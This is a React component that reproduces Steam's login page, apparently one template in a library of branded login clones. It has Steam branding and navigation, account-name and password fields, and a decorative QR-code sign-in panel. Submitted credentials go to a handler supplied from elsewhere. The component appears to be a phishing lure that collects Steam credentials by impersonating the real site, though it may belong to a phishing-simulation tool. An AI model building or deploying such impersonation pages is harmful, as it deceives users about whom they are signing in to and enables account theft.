import React from 'react';
import { LoginTemplate } from '@/lib/loginTemplates/types';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Checkbox } from '@/components/ui/checkbox';

interface SteamTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const SteamTemplate: React.FC<SteamTemplateProps> = ({
  template,
  username,
  setUsername,
  password,
  setPassword,
  handleSubmit,
  isLoading,
  navigateToSignup,
}) => {
  return (
    <div className="steam-container">
      {/* Header */}
      <header className="steam-header">
        <img 
          src={template.logoUrl} 
          alt="Steam" 
          className="h-8"
        />
        <nav className="steam-nav">
          <a href="#" className="steam-nav-link">Store</a>
          <a href="#" className="steam-nav-link">Community</a>
          <a href="#" className="steam-nav-link">About</a>
          <a href="#" className="steam-nav-link">Support</a>
        </nav>
      </header>

      {/* Login Content */}
      <div className="steam-login-container">
        <div className="steam-login-content">
          {/* Login Form */}
          <div className="steam-login-form">
            <form onSubmit={handleSubmit}>
              <div className="mb-4">
                <div className="steam-input-label">Sign in with account name</div>
                <Input
                  type="text"
                  value={username}
                  onChange={(e) => setUsername(e.target.value)}
                  className="steam-input"
                  required
                />
              </div>

              <div className="mb-4">
                <div className="steam-input-label">Password</div>
                <Input
                  type="password"
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  className="steam-input"
                  required
                />
              </div>

              <div className="steam-checkbox">
                <Checkbox id="remember" />
                <label htmlFor="remember">Remember me</label>
              </div>

              <Button
                type="submit"
                className="steam-btn"
                disabled={isLoading}
              >
                {isLoading ? 'Signing in...' : 'Sign in'}
              </Button>

              <a href="#" className="steam-help" onClick={(e) => e.preventDefault()}>
                Help, I can't sign in
              </a>

              <div className="steam-signup">
                <a href="#" onClick={(e) => {
                  e.preventDefault();
                  navigateToSignup(template.id);
                }}>
                  Create a new account
                </a>
              </div>
            </form>
          </div>

          {/* QR Code Section */}
          <div className="steam-qr">
            <div className="steam-qr-title">
              OR SIGN IN WITH QR
            </div>
            <img 
              src="https://api.qrserver.com/v1/create-qr-code/?size=200x200&data=steam://login"
              alt="Steam QR Code"
              className="steam-qr-code"
            />
            <div className="steam-qr-text">
              Use the Steam Mobile App to sign in via QR code
            </div>
          </div>
        </div>
      </div>
    </div>
  );
};

export default SteamTemplate;